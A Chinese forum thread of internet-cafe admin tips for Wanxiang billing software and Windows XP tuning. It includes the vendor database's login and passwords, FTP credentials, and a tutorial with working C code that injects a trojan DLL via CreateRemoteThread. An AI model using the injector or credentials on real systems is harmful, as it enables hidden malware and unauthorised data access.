关于万象收费系统方面问题!
其实万像新版的数据库跟9.6的没啥区别，只是他用了access的安全组控制功能
主数据库文件：2004rec.mdb（上机记录和历史记录资料）
会员数据库文件：2004mem.mdb（会员资料）
商品资料：2004stck.mdb（商品资料）
access的安全组文件：SICENT.MDW
打开工具：OFFICE　2003/XP
打开access软件，工具/安全/工作组管理员，点击加入，然后浏览，选择您的c:\wx2004\SICENT.MDW文件位置　确定
然后就打开数据库使用用户和密码：
登陆名称：datamaintain
登陆密码：万象网管是一个发展了5年的成熟的产品
然后输入数据库密码：
数据据密码：zhrmghg1949jgq
[查看全文]

关于万象收费系统方面问题!
费率无法正常计算，计费费用一直为0，交接班记录得应收费用也为0，结帐应收费用也为0，临时卡不能正常到时间自动结帐，应收费用一直为0。老板模式下面得费率设置点击发现提示：注册表被破坏，请从新设置费率；点击确定后出现红色警示：List index out bounds（－1）；
这个是您注册表损坏造成的，需要您删除万象的注册表导入默认的注册表
[查看全文]

关于万象漏洞问题
万象网管2004常见问题
1、 请问万象网管2004支持哪些操作系统？
答：万象网管2004服务端支持以下操作系统：
服务端： Microsoft Windows 2000/XP/2003
客户端： Microsoft Windows 2000/XP 专业版
注意：服务端不建议使用Windows XP Home版本以及经过特殊处理精简过的系统。
2、 请问在启动软件时出现“The specified address family is not supported”并在退出软件时出现 “The descriptor is not socket”提示是什么原因？
答：这是因为没有安装IPX协议，请安装IPX协议。
注意：安装万象网管2004服务端和客户端的时候，如果是选择使用IPX协议，那么，您需要先安装IPX/SPX协议。
3、 在安装万象网管的时候，IPX协议、TCP/IP协议、UDP协议有什么区别，我应该选用什么协议？
答：IPX 协议：这是局域网中最常见的协议，主要用于局域网，优点是速度非常快，不带丢包检验，所以在网络不好的情况下，特别是广播包太多的情况下容易丢包。
TCP/IP ：属于IP 协议一种，另外具有 TCP 协议特性，具有数据验证功能，具有高可靠性的特点，但是速度不快。建议在网络非常不稳定的情况下才使用。
UDP 协议：属于 IP 协议一种，不具备 TCP 协议特性，没有数据包正确性验证，与 IPX 协议类似。
当您的网络条件还不错的情况下，首选为 IPX 协议，其实可选择使用TCP/IP协议，UDP 协议主要用在不适合用 IPX 协议的情况下。
4、 我要怎样才能使用我注册的账号使用万象网管2004软件？
答：请双击打开万象网管2004服务端软件，出现登录窗口后，请点击“更改验证账号”，在弹出的“万象网管包月服务用户验证”的对话窗口上输入您注册的验证账号和密码，确认之后就可以使用万象网管2004了。
5、 我以前使用老版本的万象网管（专业版或者妙管家）的数据（或者其他网吧管理软件），如何将数据转到万象网管2004里？
答：在万象网管2004安装包里－－Tools目录下有“impdb.exe”这个程序，改程序是数据库软件工具，可以将万象网管任何版本以及部分其他的网管软件的数据导入到万象网管2004里面。
注意：此转换工具仅支持导入会员资料。
6、 在万象网管2004里，我应该怎样设置通宵包时？
答：万象网管2004的费率设置非常灵活，您可以使用至少以下两种方法来实现：
1、设置一个优惠时段，先设置一个开始时间，再使用鼠标拖选的方法选择一个时段段，并设置这个时段的总价。注：在设置的优惠时段范围内，将按每小时价进行扣费，在此时段内当费用达到总价后，将不再收取费用以示优惠。此费率为自动适用，不需要手工选择。
2、设置一个定额费率，在定额费率里添加一个定额，设置收多少费用，并使用多长时间。注：此费率设置以后，需要在激活卡或者在服务端开机的时候，选择费率来实现。定额费率卡上机以后一次性扣费。
7、 在万象网管2004里，我如何使用远程查帐？
答：1、打开老板查帐功能：请先将万象网管2004“服务端”－“系统设置”—“其它设置”里将“允许远程老板查帐”复选框选中，并设置查帐密码。重启万象网管2004服务端程序后会自动运行远程查帐服务器。
2、查帐程序，在万象网管2004安装包里找到“FarReport.exe”，此程序就是远程查帐程序。运行此程序，并设置服务端IP和连接密码以后，可查看历史收入和营业数据。
3、跨互联网远程查帐，需要将万象网管2004远程查帐端口“2531”映射出去，在使用查帐程序时填写网吧的互联网固定IP即可访问。
8、 我重做了系统以后，打开万象网管服务端时，为什么提示“ 请确认您现在登录的机器是您首次使用此帐户登录的机器 ”？怎么解决？
答：为了验证帐号和安全，万象网管2004的验证账号采用与首次使用的此账号的电脑进行硬件绑定功能，所以在重做了系统、更换硬件、换电脑或者其他原因导致硬件信息发生改变的时候，就会出现此提示。
解决办法是：将注册账号的时候所填写的相关信息输入，并进行变更验证，验证成功后就可正常使用。
注意：如果变更不成功或者有疑问，请与我们联系：208-85333900
9、 为什么我12点后上的卡时间变为零点？
答：这是由于操作系统采用的是12小时时间制的原因引起的，建议使用24小时制。
在万象网管2004安装包－TOOLS目录里配备了修改工具SetPanel.exe，双击运行该工具即可修正为24小时制。
10、              万象网管2004里，在计费的机器中为什么计费条有些颜色是不一样的，有绿色的、红色的、灰色的？
答：在万象网管2004里，不同的卡类型以不同颜色进行区分，
黑色：使用计费卡上机时标记显示为黑色字体；
灰色：使用计时卡上机时标记显示为灰色字体；
绿色：使用计费卡上机并采用定额收费时标记显示为绿色字体；
红色：上机卡的押金或者剩余时间不足设置的提醒费用时显示为红色字体。
11、              万象网管2004里，怎么销售商品？
答：万象网管2004里的商品销售分两种模式，一是以现金方式销售，二是以附加费的方式销售。
工具栏中的商品销售是计为现金收入。
在处理计费状态的电脑上点鼠标右键，弹出的菜单里的商品销售是附加费方式销售，在用户结帐时候收取或者从押金中计算（此功能对计时卡会员用户不能使用）。
12、              如何清理远程执行的程序后保存的命令？
答：远程执行的程序名称或 URL 地址保存在服务端安装目录下面的 URLs.lst文件中，使用记事本打开删除或者直接将此文件删除即可。
[查看全文]

关于万象收费系统方面问题!
万象数据修复官方FTP：ftp://61.152.101.129 用户名及密码均为:72885388 上传前请仔细阅读《数据上传须知》
[查看全文]

哈哈  顶起
[查看全文]

楼主真的太帅了
[查看全文]

接下一篇
-------------------------------组策略修改--------------------------------------------
运行==>>gpedit.msc==>>计算机配置==>>管理模板
网络==>>QOS数据包调度程序==>>限制可保留带宽==>>启用，带宽限制改为0
运行==>>gpedit.msc==>>用户配置==>>管理模板
WINDOWS组件==>>internet explorer
禁用更改主页设置启用
inetrnet 控制面板
安全页
内容页
连接页
程序页
隐私页
高级页
以上几项全部启用
WINDOWS组件==>>windows资源管理器
从 Windows 资源管理器中删除“文件”菜单 已启用
从 Windows 资源管理器上删除寻找按钮 已启用
隐藏 Windows 资源管理器上下文菜单上的“管理”项目 已启用
“网上邻居”中没有“我附近的计算机” 已启用
“最近的文档”的最大数目(1) 已启用
删除 CD 烧录功能 已启用
不要将已删除的文件移到“回收站” 已启用
删除文件时显示确认对话框 已启用
从“我的电脑”删除共享文档 已启用
关闭缩略图的缓存 已启用
管理模板==>>任务栏和开始菜单
从「开始」菜单删除公用程序组 已启用
从「开始」菜单中删除“我的文档”图标 已启用
从「开始」菜单上删除“文档”菜单 已启用
从「开始」菜单中删除“收藏夹”菜单 已启用
从「开始」菜单中删除“搜索”菜单 已启用
从「开始」菜单删除“帮助”命令 已启用
阻止更改“任务栏和「开始」菜单”设置 已启用
阻止访问任务栏的上下文菜单 已启用
不要保留最近打开文档的记录 已启用
管理模板==>>桌面
删除桌面上的“我的文档”图标 已启用
删除桌面上的“我的电脑”图标 已启用
从桌面删除回收站 已启用
不要将最近打开的文档的共享添加到“网上邻居” 已启用
禁止用户更改“我的文档”路径 已启用
禁止添加、拖、放和关闭任务栏的工具栏 已启用
禁用调整桌面工具栏 已启用
退出时不保存设置 已启用
删除清理桌面向导 已启用
管理模板==>>桌面==>>Active Desktop
禁用活动桌面 已启用
不允许更改 已启用
禁止添加项目 已启用
禁止删除项目 已启用
管理模板==>>控制面板
禁止访问控制面板 已启用
管理模板==>>控制面板==>>显示
删除“控制面板”中的“显示” 已启用
隐藏“桌面”选项卡 已启用
阻止更改墙纸 已启用
隐藏“外观和主题”选项卡 已启用
隐藏“设置”选项卡 未被配置
隐藏“屏幕保护程序”选项卡 已启用
屏幕保护程序 已禁用
管理模板==>>控制面板==>>显示==>>桌面主题
删除主题选项 已启用
通过改DLL来美化系统图标
※ 关于系统托盘图标的修改 ※
网络连接和音量
这两个都在C:\\WINDOWS\\system32文件夹下面，可以找到地
(网络连接)图标是在netshell.dll图标项的#1915--#1918
(音量)stｏｂｊｅｃｔ.dll图标项的 230--231
还有 (音量)stｏｂｊｅｃｔ.dll图标项的 230--231
※ 关于打开/保存对话框右上角按钮的修改 ※
还有好多人提到打开和另存为对话框右上角那个几个位图的问题，在这还是在说一遍：是comctl32.dll里面的位图项124--131，在这下面两个文件夹里面
X:\\WINDWOS\\WinSxS\\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a
X:\\WINDWOS\\WinSxS\\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805
※ 关于IE下载对话框动画的修改 ※
IE下载的AVI也有好多人问
在C:\\WINDOWS\\system32\\SHDOCVW.DLL里面的AVI资源256
※ 关于资源管理器/IE工具栏按钮的修改 ※
IE和资源管理器的工具栏按钮的替换位置为shell32.dll位图204--217
IE角上微标的替换位置为 shell32.dll 里面位图240-242
※ 关于关机/注销对话框的修改 ※
还有问的最多的问题就是关机和注销对话框了
关机是msgina.dll,
注销是shell32.dll
※ 关于Windows图片查看器的修改 ※
图片和传真查看器也是比较常见地~~~ 标题栏的字样可以修改里面字符串的第一项
下面一排按钮是shimgvw.dll位图项104～107
※ 关于控制面板项目的修改 ※
控制面板的分类视图的各个图标位置为shell32.dll图标项268～276'u(w8o d'h2` L L
控制面板的经典视图的各项图标一般在C:\\WINDOWS\\system32下对应的.cpl文件，分别为
modem.cpl 调制解调器图标
main.cpl 鼠标图标
netcpl.cpl网络连接图标
ODBCCP32.CPL ODBC 数据源
powercfg.cpl电源选项
main.cpl 打印机和传真图标
intl.cpl区域和语言设置图标
appwiz.cpl 添加/删除应用程序图标
mmsys.cpl声音与多媒体图标
sysdm.cpl系统图标
inetcpl.cpl用户图标
access.cpl辅助功能选项
sysdm.cpl添加新硬件
datetime.cpl日期时间图标
desk.cpl 显示属性
main.cpl字体图标
joy.cpl 游戏控制器图标
inetcpl.cpl Internet选项图标
main.cpl 键盘图标
mstask.dll任务计划图标
等~~~~~~
添加/删除应用程序的对话框
很多人找不到最下面那个设定程序访问和默认值的图标，
appwiz.cpl 上面三个在位图项的101--103，不是通常的图标项里面而最下面的图标在moricons.dll的图标项114
※ 关于系统属性对话框的修改 ※
好多人想改系统属性对话框上的字和里面对应的图标、位图等，我帮大家收集了一下为下面的几个文件：
计算机名netid.dll (对话框上的字,对话框项112）
远程remotepg.dll　(对话框上的字,对话框项510）
自動更新wuaueng.dll(对话框上的字,对话框项501）
常规、硬件和高级选项sysdm.cpl (对话框上的字,对话框项101）
系统还原 srrstr.dll (对话框上的字,对话框项11）
※ 关于显示属性对话框的修改 ※
显示属性对话框也是大家个性化中首要考虑的一个问题
于之相关的文件为themeui.dll和shell32.dll~~~
※ 其他 ※
系统消息中使用的图标,这个大家替换的时候一定要注意一点，图标的格式和原来的图标的格式一定要一样的，否则有可能进不了系统！！！切记
这个文件为：User32.dll图标项100--105
工具栏位图替换C:\\WINDOWS\\PCHEALTH\\HELPCTR\\Binaries下helpctr.exe里面的位图项300#--303# 还有图标项200#
还有就是里面的一些图标和位图等 下载下面的文件直接替换C:\\WINDOWS\\PCHEALTH\\HELPCTR\\System下的images文件夹
评论：大致步骤这些，有遗忘的大家提出原作不是我，我只是稍加修改而已！
听说过很多朋友说把自己网吧的系统
[查看全文]

接下篇
-----------------注册表优化设置------------------------------
关闭不正常关机导致磁盘扫描
找到下面的键值：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
再找到右边这个值：BootExecute把里面的数据全部删除
-去掉菜单延迟
Windows XP中的菜单在打开时会有滑出的效果，但这也会延缓打开速度。我们可以在HKEY_CURRENT_USER\Control Panel\Desktop下找到“MenuShowDelay”主键，把它的值改为“0”就可以去掉菜单延迟效果。
-不加载多余的DLL文件
-关闭XP文件保护
-关闭程序仅等待1秒_程序出错时等待0.5秒
-加快菜单显示速度
-加快局域网访问速度
-减少开机滚动条滚动次数
-清除共享文件夹
-取消快捷方式的箭头
-缩短XP的开关机的等待时间
-自动关闭停止响应的程序
-删除图标快捷方式的字样
-停止磁盘空间不足警告
-完全禁用系统还原
-彻底关闭Dr_Warson
-打开启动优化功能
-加快菜单显示速度
-加快程序运行速度
-加快开关机机速度,自动关闭停止响应的程序
-加快开机速度副值
-开启硬件优化
-启动XP的路由功能和IP的过滤功能
-启动预读和程序预读可以减少启动时间
-修复AMD处理器的AGP内存分页问题
-禁用文件夹选项菜单
-禁止访问任务栏属性
-禁止远程修改注册表
-屏蔽资源管理器中的(文件F)和(搜索)菜单
-删除在开始菜单中的(文档)选项
-锁定IE的下载功能
-关闭平滑字体
-在单独内存空间运行
-自动清除内存中多余的dll资料
-开启CPU二级缓存,加速系统核心处理进程
-禁PP,PocoQQ,BT等非常软件注册表补丁
-优化XP 2K 注册表启动速度
-cs鼠标加速注册表文件
-关闭活动桌面
-禁止 在网上邻居显示 我附近的计算机
-禁止CD-ROM自动运行
-自动点亮num灯
以上是我用的注册表
-取消快捷方式的手动修改法
1．运行注册表编辑器，打开HKEY_CLASSES_ROOT\lnkfile分支。
2．在lnkfile子键下面找到一个名为“IsShortcut”的键值，它表示在桌面的.LNK快捷方式图标上将出现一个小箭头。右键单击“IsShortcut”，然后从弹出的菜单中选择“删除”，将该键值删除。
3．关闭注册表编辑器，重新启动，就可发现快捷方式图标上已经没有小箭头了。
同理，对指向MS－DOS程序的快捷方式（即.PIF）图标上的小箭头，则除了是打开HKEY_CLASSES_ROOT\piffile分支外，其余同上。
----------------------使用工具优化XP---------------------------------
upiea：
屏蔽插件，恶意网站，禁止默认共享，优化网络，
优化网络的最大传输单元我设置为1400
屏蔽恶意网站：HOSTS文件(自己修改好的)
2000XP2003关闭系统文件保护工具
优化大师优化
WIN2000添加删除程序扩展
自动登陆器
频率锁定工具
屏蔽Taskmgr中止进程选项的工具
屏蔽开始菜单选项工具
屏蔽控制面板选项工具
-----------------------以下是服务----------------------------------
Cryptographic Services          已启动 自动 本地系统
EVEnt Log                  已启动 自动 本地系统
Plug and Play                         已启动 自动 本地系统
Remote Procedure Call (RPC)         已启动 自动 本地系统
Secondary Logon                  已启动 自动 本地系统
System Restore Service           自动 本地系统
Windows Audio                         已启动 自动 本地系统
Windows Management Instrumentation 已启动 自动 本地系统
Windows User Mode Driver Framework 已启动 自动    本地系统
Workstation                         已启动 自动 本地系统
Application Layer Gateway Service                         手动 本地服务
Application Management                           手动 本地系统
COM+ EVEnt System                           已启动 手动 本地系统
COM+ System Application                                   手动 本地系统
Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)  手动 本地系统
IPSEC Services                                   手动 本地系统
Logical Disk Manager                                   手动 本地系统
Logical Disk Manager Administrative Service    手动 本地系统
MS Software Shadow Copy Provider                  手动 本地系统
Net Logon                                    手动 本地系统
NetMeeting Remote Desktop Sharing                 手动 本地系统
Network Connections                          已启动 手动 本地系统
Network DDE                                                 手动 本地系统
Network DDE DSDM                                  手动 本地系统
Network Location Awareness (NLA)          已启动 手动 本地系统
Performance Logs and Alerts                            手动 网络服务
Portable Media Serial Number Service RetriEVEs <A target=_blank href="javascript:;" target=_blank>the serial number of any portable media player connected to this computer. If this service is stopped, protected content might not be down loaded to the device.                          手动 本地系统
Protected Storage                           手动 本地系统
Remote Access Auto Connection Manager                  手动 本地系统
Remote Access Connection Manager            手动 本地系统
Remote Procedure Call (RPC) Locator                  手动 网络服务
Removable Storage                           手动 本地系统
Server                                                手动 本地系统
Smart Card                                    手动 本地服务
System EVEnt Notification                  已启动 手动 本地系统
Task Scheduler                                    手动 本地系统
Terminal Services                                         手动 本地系统
Uninterruptible Power Supply                    手动 本地系统
WebClient                                          手动 本地服务
Windows Installer                            手动 本地系统
Windows Management Instrumentation Driver Extensions  手动 本地系统
Windows Time                                                 手动 本地系统
Alerter                                           已禁用 本地服务
Automatic Updates                                         已禁用 本地系统
Background Intelligent Transfer Service             已禁用 本地系统
ClipBook                                                 已禁用 本地系统
Computer Browser                             已禁用 本地系统
DHCP Client                                               已禁用 本地系统
Distributed Link Tracking Client                  已禁用 本地系统
Distributed Transaction Coordinator                         已禁用 网络服务
DNS Client                                      已禁用 网络服务
Error Reporting Service                             已禁用 本地系统
Fast User Switching Compatibility              已禁用 本地系统
Help and Support                                         已禁用 本地系统
Human Interface Device Access                            已禁用 本地系统
IMAPI CD-Burning COM Service                                 已禁用 本地系统
Indexing Service                                                已禁用 本地系统
Messenger                                                 已禁用 本地系统
NT LM Security Support Provider                             已禁用 本地系统
Print Spooler                                   已禁用 本地系统
QoS RSVP                                     已禁用 本地系统
Remote Desktop Help Session Manager                         已禁用 本地系统
Remote Registry                                                 已禁用 本地服务
Routing and Remote Access                    已禁用 本地系统
Security Accounts Manager                                 已禁用 本地系统
Shell Hardware Detection                   已禁用 本地系统
Smart Card Helper                             已禁用 本地服务
SSDP Discovery Service                                         已禁用 本地服务
TCP/IP NetBIOS Helper                            已禁用 本地服务
Telephony                                                 已禁用 本地系统
Telnet                                                         已禁用 本地系统
Themes                                                         已禁用 本地系统
Universal Plug and Play Device Host                  已禁用 本地服务
Upload Manager                                    已禁用 本地系统
Volume Shadow Copy                                         已禁用 本地系统
Windows Image Acquisition (WIA)                            已禁用 本地系统
Wireless Zero Configuration                          已禁用 本地系统
WMI Performance Adapter                           已禁用 本地系统
[查看全文]

XP网吧客户机母盘制作流程（仅供参考）
XP母盘制作流程（小兵修改）二
ok,接下来就是优化了,在优化之前做个备份，以便优化过头再恢复GHOST
-----------------XP系统优化设置------------------------------
使用经典菜单:
鼠标右键单击任务栏空白处，选择“属性”菜单，进入“任务栏和开始菜单属性”的设置窗口，选择
“[开始]菜单”选项卡，选择“经典[开始]菜单”
关掉调试器Dr. Watson； ,
运行drwtsn32，把除了“转储全部线程上下文”之外的全都去掉。否则一旦有程序出错，硬盘会响很久，而且会占用很多空间。
关闭“休眠支持”：因为休眠功能占的硬碟空间蛮大的, 所以关闭比较好,
控制台-->电源选项-->休眠(不要打勾)
取消XP自带的压缩文件夹工具：
点击开始—>运行，敲入： regsvr32 /u zipfldr.dll 。然后回车即可。
去除XP自带图片预览功能：Regsvr32 /u Thumbvw.dll
优化视觉效果
右键单击桌面==>>属性==>>外观==>>改为滚动效果,边缘字体改为标准，然后将所有勾去掉，只留“直到我按ALT前请隐藏有下划线的字母供键盘使用”打上勾
减少启动时加载项目
打开注册表找到“[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]”将右边窗口的所有键值删除。
关闭系统还原功能
我的电脑==>>属性==>>系统还原,打上勾.
关闭自动更新
右键单击“我的电脑/属性/自动更新”，在“通知设置”一栏选择“保持自动更新”一项打勾。
关闭远程桌面
右键单击“我的电脑”，选择“属性/远程”，把“远程桌面”里的,“允许用户远程连接到这台计算机”勾去掉。
关闭“自动发送错误报告”功能
我的电脑==>>系统==>>高级，单击“错误报告”按钮，然后选中“禁用错误报告”，下面的“但在发生严重错误时通知我”可以选中。
合理设置虚拟内存
我的电脑==>>系统==>>高级==>>性能==>>设置==>>高级==>>虚拟内存==>>更改”，来到虚拟内存设置窗口，首先确定你的页面文件在哪个驱动器盘符，然后将别的盘符驱动器的页面文件全部禁用。建议你把它是设置到其他分区上，而不是默认的系统所在的分区，这样可以提高页面文件的读写速度，有利于系统的快速运行。根据微软的建议，页面文件应设为内存容量的1.5倍，但如果你的内存比较大，那它占用的空间也是很可观的，所以，建议如果内存容量在256MB以下，就设置为1.5倍，最大值和最小值3倍,我的设置为768。一样，如果在512MB以上，设置为内存容量的一半到一倍。
关闭写入调试
我的电脑==>>属性==>>高级==>>启动和故障恢复,写入调试信息改为无，除了在需要时恢复显示选项的时候改为5秒打勾外其余的全把勾去掉
删除多余文档
Windows XP中有许多文件平时我们很少用到，放在硬盘中，白白浪费空间，降低系统性能。我们完全可以把这些用不到的文件删除，需要删除的文件有：
帮助文件：在C:WindowsHelp目录下。
驱动备份：C:Windowsdriver cachei386目录下的Driver.cab文件。
系统文件备份： 一般用户是不怎么用的，利用命令sfc.exe /purgecache删除。
备用的dll文件:在C:Windowssystem32dllcache目录下。
输入法：在C:WindowsIme文件夹下直接删除chtime、imjp8_1、imkr6_1三个目录即可，分别是繁体中文、日文、韩文输入法。
删除WindowsXP中隐含的组件
Windows XP在正常安装之后，会自动安装许多组件，这些组件有许多是平时用不到的，安装在系统中会占用很多空间，降低系统性能，我们可以用下述方法删除不用的组件。
用记事本修改C:WindowsInf目录下的Sysoc.inf文件，用查找/替换功能，在查找框中输入“,hide”（,个英文逗号紧跟hide），将“替换为”框设为空。并选全部替换，这样，就把所有的“,hide”都去掉了
，存盘退出，再单击“开始/控制面板/添加或删除程序”,就可以看到许多平时见不到的组件，选择不需要程序进行删除即可。
删除多余字体
Windows XP中安装的字体越多，就会占用更多的内存的系统资源，减慢系统的运行速度，因此，对于不常用的字体，我们最好把它从系统中删除。字体文件存放在C:Windowsfont目录下，你完全可以根据需要选择一些字体，对于更多不用的字体，一删了之。
更改IE临时文件夹
Internet Explorer==>>属性==>>常规==>>设置==>>指定临时文件夹大小，再点移动到你所要放置临时文件夹的盘符.比如E:\Temporary Internet Files
启用DMA传输模式
所谓DMA，即直接存储器存储模式，指计算机周边设备（主要指硬盘）可直接与内存交换数据，这样可加快硬盘读写速度，提高速据传输速率。由于某些原因，Windows XP有时会在IDE通道上使用PIO并行输入输;出传输模式，而不是DMA模式。如果有这种情况，用户可以手动把IDE通道改为DMA模式，这样可以减少该设备占用的CPU周期。方法是：右键点击“我的电脑”，选“属性”，点选“硬件”选项卡，单击“设备
管理器”按钮，打开“设备管理器”，然后点击展开“IDE ATA/ATAPI 控制器”分支，其中“IDE控制器”有两项“主要IDE通道”及“次要IDE通”，分别选中，依次进入“属性/高级设置”，该对话框会列出目前IDE接口所连接设备的传输模式，检查“传输模式”下拉菜单，把它们全部设“DMA(若可用)”，点击“确定”。
减少磁盘扫描等待时间
WindowsXP虽然号称稳定，但是并不是永不死机，偶尔也会给你个蓝脸，非法操作后系统会自动扫描，出现大段大段的E文，告诉你刚才系统非正常结束，现在需要检查一下是否出错，可是还要等待一段时间才开始，所以我们可以在dos下，键入“chkntfs/t:0”，表示等待时间为0秒。
让系统自动关闭停止响应的程序
采用Windows 98/2000的窗口风格
取消任务栏的分组相似任务栏按钮功能
禁止隐藏不活动的图标
以上用到的注册表 有个120项注册表优化包  无需一个个修改 当然你像借此机会熟悉注册表各结构 不妨自己尝试
下面继续。。。
[查看全文]

黑线 2006-11-07 19:49
DLL木马的原理
什么是 DLL？
DLL 是一个包含可由多个程序同时使用的代码和数据的库。例如，在 Windows 操作系统中，Comdlg32 DLL 执行与对话框有关的常见函数。因此，每个程序都可以使用该 DLL 中包含的功能来实现“打开”对话框。这有助于促进代码重用和内存的有效使用。
通过使用 DLL，程序可以实现模块化，由相对独立的组件组成。例如，一个计帐程序可以按模块来销售。可以在运行时将各个模块加载到主程序中（如果安装了相应模块）。因为模块是彼此独立的，所以程序的加载速度更快，而且模块只在相应的功能被请求时才加载。
此外，可以更为容易地将更新应用于各个模块，而不会影响该程序的其他部分。例如，您可能具有一个工资计算程序，而税率每年都会更改。当这些更改被隔离到 DLL 中以后，您无需重新生成或安装整个程序就可以应用更新。
下表说明了 Windows 操作系统中的一些作为 DLL 实现的文件：• ActiveX 控件 (.ocx) 文件
ActiveX 控件的一个示例是日历控件，它使您可以从日历中选择日期。
• 控制面板 (.cpl) 文件
.cpl 文件的一个示例是位于控制面板中的项。每个项都是一个专用 DLL。
• 设备驱动程序 (.drv) 文件
设备驱动程序的一个示例是控制打印到打印机的打印机驱动程序。
DLL木马的实现原理是编程者在DLL中包含木马程序代码，随后在目标主机中选择特定目标进程，以某种方式强行指定该进程调用包含木马程序的DLL，最终达到侵袭目标系统的目的。
正是DLL程序自身的特点决定了以这种形式加载木马不仅可行，而且具有良好的隐藏性：
（1）DLL程序被映射到宿主进程的地址空间中，它能够共享宿主进程的资源，并根据宿主进程在目标主机的级别非法访问相应的系统资源；
（2）DLL程序没有独立的进程地址空间，从而可以避免在目标主机中留下"蛛丝马迹"，达到隐蔽自身的目的。
DLL木马实现了"真隐藏"，我们在任务管理器中看不到木马"进程"，它完全溶进了系统的内核。与"真隐藏"对应的是"假隐藏"，"假隐藏"木马把自己注册成为一个服务。虽然在任务管理器中也看不到这个进程，但是"假隐藏"木马本质上还具备独立的进程空间。"假隐藏"只适用于Windows9x的系统，对于基于WINNT的操作系统，通过服务管理器，我们可以发现系统中注册过的服务。
DLL木马注入其它进程的方法为远程线程插入。
远程线程插入技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。将木马程序以DLL的形式实现后，需要使用插入到目标进程中的远程线程将该木马DLL插入到目标进程的地址空间，即利用该线程通过调用Windows API LoadLibrary函数来加载木马DLL，从而实现木马对系统的侵害。
DLL木马注入程序
这里涉及到一个非常重要的Windows API――CreateRemoteThread。与之相比，我们所习惯使用的CreateThread API函数只能在进程自身内部产生一个新的线程，而且被创建的新线程与主线程共享地址空间和其他资源。而CreateRemoteThread则不同，它可以在另外的进程中产生线程！CreateRemoteThread有如下特点：
（1）CreateRemoteThread较CreateThread多一个参数hProcess，该参数用于指定要创建线程的远程进程，其函数原型为：
HANDLE CreateRemoteThread(
HANDLE hProcess, //远程进程句柄
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);
（2）线程函数的代码不能位于我们用来注入DLL木马的进程所在的地址空间中。也就是说，我们不能想当然地自己写一个函数，并把这个函数作为远程线程的入口函数；
（3）不能把本进程的指针作为CreateRemoteThread的参数，因为本进程的内存空间与远程进程的不一样。
以下程序由作者Shotgun的DLL木马注入程序简化而得（单击此处下载，在经典书籍《Windows核心编程》中我们也可以看到类似的例子），它将d盘根目录下的troydll.dll插入到ID为4000的进程中：
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
void CheckError ( int, int, char *); //出错处理函数
PDWORD pdwThreadId;
HANDLE hRemoteThread, hRemoteProcess;
DWORD fdwCreate, dwStackSize, dwRemoteProcessId;
PWSTR pszLibFileRemote=NULL;
void main(int argc,char **argv)
{
int iReturnCode;
char lpDllFullPathName[MAX_PATH];
WCHAR pszLibFileName[MAX_PATH]={0};
dwRemoteProcessId = 4000;
strcpy(lpDllFullPathName, "d:\\troydll.dll");
//将DLL文件全路径的ANSI码转换成UNICODE码
iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
lpDllFullPathName, strlen(lpDllFullPathName),
pszLibFileName, MAX_PATH);
CheckError(iReturnCode, 0, "MultByteToWideChar");
//打开远程进程
hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许创建线程
PROCESS_VM_OPERATION | //允许VM操作
PROCESS_VM_WRITE, //允许VM写
FALSE, dwRemoteProcessId );
CheckError( (int) hRemoteProcess, NULL, "Remote Process not Exist or Access Denied!");
//计算DLL路径名需要的内存空间
int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);
CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx");
//将DLL的路径名复制到远程进程的内存空间
iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
CheckError(iReturnCode, false, "WriteProcessMemory");
//计算LoadLibraryW的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
CheckError((int)pfnStartAddr, NULL, "GetProcAddress");
//启动远程线程，通过远程线程调用用户的DLL文件
hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);
CheckError((int)hRemoteThread, NULL, "Create Remote Thread");
//等待远程线程退出
WaitForSingleObject(hRemoteThread, INFINITE);
//清场处理
if (pszLibFileRemote != NULL)
{
VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
}
if (hRemoteThread != NULL)
{
CloseHandle(hRemoteThread );
}
if (hRemoteProcess!= NULL)
{
CloseHandle(hRemoteProcess);
}
}
//错误处理函数CheckError()
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
if(iReturnCode==iErrorCode)
{
printf("%s Error:%d\n\n", pErrorMsg, GetLastError());
//清场处理
if (pszLibFileRemote != NULL)
{
VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
}
if (hRemoteThread != NULL)
{
CloseHandle(hRemoteThread );
}
if (hRemoteProcess!= NULL)
{
CloseHandle(hRemoteProcess);
}
exit(0);
}
}
从DLL木马注入程序的源代码中我们可以分析出DLL木马注入的一般步骤为：
（1）取得宿主进程（即要注入木马的进程）的进程ID dwRemoteProcessId；
（2）取得DLL的完全路径，并将其转换为宽字符模式pszLibFileName；
（3）利用Windows API OpenProcess打开宿主进程，应该开启下列选项：
a.PROCESS_CREATE_THREAD：允许在宿主进程中创建线程；
b.PROCESS_VM_OPERATION：允许对宿主进程中进行VM操作；
c.PROCESS_VM_WRITE：允许对宿主进程进行VM写。
（4）利用Windows API VirtualAllocEx函数在远程线程的VM中分配DLL完整路径宽字符所需的存储空间，并利用Windows API WriteProcessMemory函数将完整路径写入该存储空间；
